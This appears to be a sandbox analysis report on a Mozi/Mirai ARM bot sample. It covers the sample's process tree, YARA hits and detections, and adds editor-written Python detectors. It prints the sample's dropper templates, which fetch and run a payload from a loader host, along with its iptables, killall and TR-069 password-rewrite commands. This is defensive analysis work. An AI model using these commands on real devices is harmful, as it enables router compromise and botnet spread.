
Analysis Report mozi.a.zip

Overview

General Information

Sample Name:mozi.a.zip
Analysis ID:349551
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai (three rule matches: JoeSecurity_Mirai_8, JoeSecurity_Mirai_9, JoeSecurity_Mirai_4)
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Startup

  • system is lnxubuntu1
  • mozi.a.zip (PID: 4580, Parent: 4518, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/mozi.a.zip
    • mozi.a.zip New Fork (PID: 4596, Parent: 4580)
      • mozi.a.zip New Fork (PID: 4598, Parent: 4596)
        • sh (PID: 4600, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4602, Parent: 4600)
          • killall (PID: 4602, Parent: 4600, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • mozi.a.zip New Fork (PID: 4621, Parent: 4598)
          • sh (PID: 4634, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4638, Parent: 4634)
            • iptables (PID: 4638, Parent: 4634, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              • iptables New Fork (PID: 4652, Parent: 4638)
              • modprobe (PID: 4652, Parent: 4638, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • sh (PID: 4668, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4670, Parent: 4668)
            • iptables (PID: 4670, Parent: 4668, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
          • sh (PID: 4671, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4674, Parent: 4671)
            • iptables (PID: 4674, Parent: 4671, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
          • sh (PID: 4711, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4718, Parent: 4711)
            • iptables (PID: 4718, Parent: 4711, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
          • sh (PID: 4732, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
            • sh New Fork (PID: 4737, Parent: 4732)
            • iptables (PID: 4737, Parent: 4732, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
          • sh (PID: 4741, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
            • sh New Fork (PID: 4747, Parent: 4741)
            • iptables (PID: 4747, Parent: 4741, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
          • sh (PID: 4764, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
            • sh New Fork (PID: 4772, Parent: 4764)
            • iptables (PID: 4772, Parent: 4764, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
          • sh (PID: 4789, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
            • sh New Fork (PID: 4793, Parent: 4789)
            • iptables (PID: 4793, Parent: 4789, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
        • sh (PID: 4811, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4813, Parent: 4811)
          • iptables (PID: 4813, Parent: 4811, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 4814, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4816, Parent: 4814)
          • iptables (PID: 4816, Parent: 4814, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 4818, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4825, Parent: 4818)
          • iptables (PID: 4825, Parent: 4818, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 4838, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4847, Parent: 4838)
          • iptables (PID: 4847, Parent: 4838, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 4865, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 4875, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 4887, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4895, Parent: 4887)
          • iptables (PID: 4895, Parent: 4887, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 4911, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4918, Parent: 4911)
          • iptables (PID: 4918, Parent: 4911, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 4938, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4945, Parent: 4938)
          • iptables (PID: 4945, Parent: 4938, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 4960, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4966, Parent: 4960)
          • iptables (PID: 4966, Parent: 4960, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 4978, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4985, Parent: 4978)
          • iptables (PID: 4985, Parent: 4978, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 4998, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5004, Parent: 4998)
          • iptables (PID: 5004, Parent: 4998, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 5015, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5022, Parent: 5015)
          • iptables (PID: 5022, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 5034, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5042, Parent: 5034)
          • iptables (PID: 5042, Parent: 5034, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 5053, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5060, Parent: 5053)
          • iptables (PID: 5060, Parent: 5053, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 5072, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5079, Parent: 5072)
          • iptables (PID: 5079, Parent: 5072, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 5087, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5097, Parent: 5087)
          • iptables (PID: 5097, Parent: 5087, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 5113, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5118, Parent: 5113)
          • iptables (PID: 5118, Parent: 5113, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 5217, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5219, Parent: 5217)
          • iptables (PID: 5219, Parent: 5217, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
        • sh (PID: 5220, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5222, Parent: 5220)
          • iptables (PID: 5222, Parent: 5220, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
        • sh (PID: 5223, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5226, Parent: 5223)
          • iptables (PID: 5226, Parent: 5223, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
        • sh (PID: 5233, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5242, Parent: 5233)
          • iptables (PID: 5242, Parent: 5233, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
        • sh (PID: 5255, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
          • sh New Fork (PID: 5265, Parent: 5255)
          • iptables (PID: 5265, Parent: 5255, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 8987 -j ACCEPT
        • sh (PID: 5282, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
          • sh New Fork (PID: 5288, Parent: 5282)
          • iptables (PID: 5288, Parent: 5282, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
        • sh (PID: 5306, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
          • sh New Fork (PID: 5314, Parent: 5306)
          • iptables (PID: 5314, Parent: 5306, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
        • sh (PID: 5332, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
          • sh New Fork (PID: 5338, Parent: 5332)
          • iptables (PID: 5338, Parent: 5332, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
  • upstart New Fork (PID: 5136, Parent: 3310)
  • sh (PID: 5136, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5141, Parent: 5136)
    • date (PID: 5141, Parent: 5136, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5154, Parent: 5136)
    • apport-checkreports (PID: 5154, Parent: 5136, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 5163, Parent: 3310)
  • sh (PID: 5163, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5164, Parent: 5163)
    • date (PID: 5164, Parent: 5163, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5181, Parent: 5163)
    • apport-gtk (PID: 5181, Parent: 5163, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 5190, Parent: 3310)
  • sh (PID: 5190, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5191, Parent: 5190)
    • date (PID: 5191, Parent: 5190, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5208, Parent: 5190)
    • apport-gtk (PID: 5208, Parent: 5190, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup
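Two points in the tree above matter for anyone triaging a device. First, although the sample is named mozi.a.zip, the sandbox runs it directly under /usr/bin/qemu-arm: it is an ARM ELF, not an archive, so do not feed it to an unarchiver. Second, the children of PID 4598 show the whole Mozi hardening routine: killall against the device telnet daemons, iptables ACCEPT rules for TCP 60120 and UDP 8987 (the port the inbound "Mozi Botnet DHT Config Sent" alerts below go to), iptables DROP rules for TCP 7547 (TR-069/CWMP) and three further management ports (35000, 50023, 58000), each rule issued twice with the long (--destination-port) and short (--dport) option spellings, presumably so that one of them is accepted by whichever iptables build the device ships, and two cfgtool calls that rewrite the Huawei configuration tree's TR-069 ManagementServer URL to http://127.0.0.1 and its ConnectionRequestPassword to "acsMozi". The net effect is that the infected device stops answering its ISP's ACS and competing exploiters while keeping the bot's own listener and DHT port reachable.

The following added example (it is not Joe Sandbox code and not the sample's own code) turns that pattern into a check over recorded command lines, as an auditd execve stream or a sandbox process tree would supply them. The sample input is constructed from the command lines in the tree above plus one benign background process; the function and type names are this example's own.

```python
"""Flag Mozi-style firewall/ACS tampering in recorded command lines.

Added example, not Joe Sandbox or Mozi code. Input is a list of argv strings
as a process tree or auditd execve log records them.
"""
import shlex
from dataclasses import dataclass, field

# Constructed sample input: a subset of the command lines this report records
# for the sample's children, plus one benign background process (apport).
SAMPLE_CMDLINES = [
    '/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"',
    '/bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"',
    '/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"',
    '/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"',
    '/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml '
    'InternetGatewayDevice.ManagementServer URL \\"http://127.0.0.1\\""',
    '/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml '
    'InternetGatewayDevice.ManagementServer ConnectionRequestPassword \\"acsMozi\\""',
    '/usr/bin/python3 /usr/share/apport/apport-checkreports --system',
]

# Both spellings are used by the sample, so both must be recognised.
PORT_FLAGS = {"--dport", "--destination-port", "--sport", "--source-port"}


@dataclass
class Findings:
    opened: set = field(default_factory=set)     # (proto, port) given -j ACCEPT
    blocked: set = field(default_factory=set)    # (proto, port) given -j DROP
    killed: set = field(default_factory=set)     # process names passed to killall
    acs_changes: dict = field(default_factory=dict)  # TR-069 ManagementServer keys rewritten

    def verdict(self):
        """Return (is_mozi_like, reasons). All four traits are required, because
        any single one (a DROP rule, a killall) is common in legitimate admin work."""
        reasons = []
        if self.killed & {"telnetd", "utelnetd"}:
            reasons.append("kills the device telnet daemon")
        if any(p == "tcp" for p, _ in self.opened) and ("udp", 8987) in self.opened:
            reasons.append("opens a TCP listener port and UDP 8987 (DHT)")
        if ("tcp", 7547) in self.blocked:
            ports = ", ".join(str(p) for _, p in sorted(self.blocked))
            reasons.append("drops TR-069/CWMP (7547) and other management ports: " + ports)
        if "URL" in self.acs_changes:
            reasons.append("repoints the TR-069 ACS URL to " + self.acs_changes["URL"])
        return len(reasons) == 4, reasons


def unwrap_shell(cmdline):
    """Split a command line; for `sh -c "..."` return the inner command's argv."""
    argv = shlex.split(cmdline)
    if len(argv) >= 3 and argv[0].rsplit("/", 1)[-1] == "sh" and argv[1] == "-c":
        return shlex.split(argv[2])
    return argv


def parse_iptables(argv):
    """Extract (proto, port, target) from an iptables argv, or None without a port rule."""
    proto = port = target = None
    for i, tok in enumerate(argv[1:], 1):
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        if tok == "-p":
            proto = nxt
        elif tok in PORT_FLAGS and nxt and nxt.isdigit():
            port = int(nxt)
        elif tok == "-j":
            target = nxt
    return (proto, port, target) if proto and port and target else None


def detect(cmdlines):
    """Accumulate firewall, killall and cfgtool evidence from a list of command lines."""
    f = Findings()
    for line in cmdlines:
        argv = unwrap_shell(line)
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "iptables":
            rule = parse_iptables(argv)
            if rule and rule[2] == "ACCEPT":
                f.opened.add(rule[:2])
            elif rule and rule[2] == "DROP":
                f.blocked.add(rule[:2])
        elif prog == "killall":
            f.killed.update(a for a in argv[1:] if not a.startswith("-"))
        elif (prog == "cfgtool" and len(argv) >= 6 and argv[1] == "set"
              and argv[3].endswith(".ManagementServer")):
            f.acs_changes[argv[4]] = argv[5]
    return f


if __name__ == "__main__":
    hit, why = detect(SAMPLE_CMDLINES).verdict()
    print("mozi-like:", hit)
    for r in why:
        print(" -", r)
```

The check deliberately refuses to fire on a lone ACCEPT or DROP rule; on a real device, compare the blocked set against the ports the ISP's management plane actually uses (the report does not say what 35000, 50023 and 58000 serve on the targeted hardware), and treat any rewrite of InternetGatewayDevice.ManagementServer.* outside a provisioning window as an incident on its own.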

Yara Overview

Initial Sample

Source: mozi.a.zip
  • Rule: SUSP_XORed_Mozilla (Florian Roth): Detects suspicious XORed keyword - Mozilla/5.0
    Strings:
    • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • Rule: JoeSecurity_Mirai_8 (Joe Security): Yara detected Mirai
  • Rule: JoeSecurity_Mirai_9 (Joe Security): Yara detected Mirai
  • Rule: JoeSecurity_Mirai_4 (Joe Security): Yara detected Mirai

Dropped Files

Source: /usr/networks
  • Rule: SUSP_XORed_Mozilla (Florian Roth): Detects suspicious XORed keyword - Mozilla/5.0
    Strings:
    • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • Rule: JoeSecurity_Mirai_8 (Joe Security): Yara detected Mirai
  • Rule: JoeSecurity_Mirai_9 (Joe Security): Yara detected Mirai
  • Rule: JoeSecurity_Mirai_4 (Joe Security): Yara detected Mirai

The five match offsets in /usr/networks are identical to those in the submitted sample, consistent with the dropped file being a copy of the sample written to disk (see "Writes ELF files to disk" in the signature list).
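The SUSP_XORed_Mozilla hits above (for both the submitted sample and the /usr/networks copy) are worth decoding rather than just counting. The rule looks for the keyword Mozilla/5.0 under every single-byte XOR key, and the bytes it reports, oMXKNNC\x0D\x17\x0C\x12, are exactly Mozilla/5.0 XORed with 0x22. A bot that obfuscates its User-Agent this way typically protects its other strings the same way, so the recovered key is worth trying against the rest of the binary's data.

The added example below (this editor's code, not the Yara rule's source and not the sample's code) recovers the key from the reported bytes and then reimplements the rule's scan over a constructed buffer that places the hit bytes at the five offsets the report lists; the buffer is synthetic, not the sample's contents.

```python
"""Recover a single-byte XOR key from a Yara string hit and emulate the
SUSP_XORed_Mozilla scan. Added example, not Yara or Mozi code."""

KEYWORD = b"Mozilla/5.0"
# The bytes Yara reported at each of the five offsets above, as a bytes literal.
HIT = b"oMXKNNC\x0d\x17\x0c\x12"
# Offsets taken from the report; the buffer content around them is constructed.
REPORTED_OFFSETS = [0x37450, 0x374C0, 0x37530, 0x375A0, 0x37610]


def xor_bytes(data, key):
    """XOR every byte of data with the single-byte key."""
    return bytes(b ^ key for b in data)


def recover_single_byte_key(ciphertext, plaintext):
    """Return the key k with ciphertext == plaintext ^ k, or None if no single
    byte explains every position (i.e. the sample is not single-byte XOR)."""
    if len(ciphertext) != len(plaintext):
        return None
    keys = {c ^ p for c, p in zip(ciphertext, plaintext)}
    return keys.pop() if len(keys) == 1 else None


def scan_xored_keyword(buf, keyword=KEYWORD):
    """Emulate the rule: find keyword under every key 0x01..0xff (key 0x00 is
    the plaintext and is excluded, as in the rule). Returns sorted (offset, key)."""
    hits = []
    for key in range(1, 256):
        needle = xor_bytes(keyword, key)
        start = 0
        while (i := buf.find(needle, start)) != -1:
            hits.append((i, key))
            start = i + 1
    return sorted(hits)


def build_sample_buffer():
    """Constructed stand-in for the binary: zero-filled, with the reported hit
    bytes at the reported offsets and one plaintext copy that must not match."""
    buf = bytearray(0x37700)
    buf[0x100:0x100 + len(KEYWORD)] = KEYWORD
    for off in REPORTED_OFFSETS:
        buf[off:off + len(HIT)] = HIT
    return bytes(buf)


if __name__ == "__main__":
    key = recover_single_byte_key(HIT, KEYWORD)
    print("key: 0x%02x -> %r" % (key, xor_bytes(HIT, key)))
    for off, k in scan_xored_keyword(build_sample_buffer()):
        print("0x%x key=0x%02x" % (off, k))
```

Once the key is known, `xor_bytes(region, 0x22)` over neighbouring data regions of the ELF is the cheap next step; whether the sample's configuration strings share that key is not something this report states, so treat any further decodes as a hypothesis to confirm in the disassembler.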

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: mozi.a.zip, Avira: detected
Antivirus detection for dropped file
Source: /usr/networks, Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: mozi.a.zip, Virustotal: Detection: 65%
Source: mozi.a.zip, Metadefender: Detection: 51%
Source: mozi.a.zip, ReversingLabs: Detection: 67%

Spreading:

Found strings indicative of a multi-platform dropper
Source: mozi.a.zip, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: mozi.a.zip, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: mozi.a.zip, String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/mozi.a.zip (PID: 4621), Opens: /proc/net/route
Source: /tmp/mozi.a.zip (PID: 4621), Opens: /proc/net/route
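The two dropper strings above are printf templates: the bot fills the %s:%d placeholders with a loader host and port after it has broken into a victim over telnet or one of the HTTP exploits listed under Networking, and sends the result as a single shell line. The template is worth reading closely because each clause defeats a common hardening measure: the `>/dir/.x&&cd /dir` chain probes seven directories until it finds a writable one; three download tools are tried in turn (wget, curl, then busybox wget); and if `chmod 777` fails, `cp /bin/ls ii; cat i>ii; ...` copies an existing executable and overwrites its contents, so the payload inherits the execute bit without chmod. The second variant fetches bin.sh and runs it with `sh` instead of executing a binary.

The added example below (this editor's code, not the sample's and not Joe Sandbox's) parses such a one-liner as a honeypot or proxy would capture it and returns the loader address, the probed directories, the dropped file name and the fallbacks in use. The templates are copied from the report; the concrete instance is constructed with an RFC 5737 documentation address and a placeholder marker string, and the regexes and field names are this example's own.

```python
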